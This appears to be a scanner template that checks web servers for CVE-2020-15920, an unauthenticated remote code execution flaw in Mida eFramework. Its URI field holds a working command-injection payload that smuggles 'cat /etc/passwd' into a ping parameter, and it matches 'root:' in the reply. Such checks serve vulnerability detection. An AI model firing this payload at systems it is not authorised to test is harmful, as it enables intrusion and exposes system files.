AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-15920 - Mida eFramework Unauthenticated RCE'
URI='/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING'
METHOD='GET'
MATCH='root\:'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'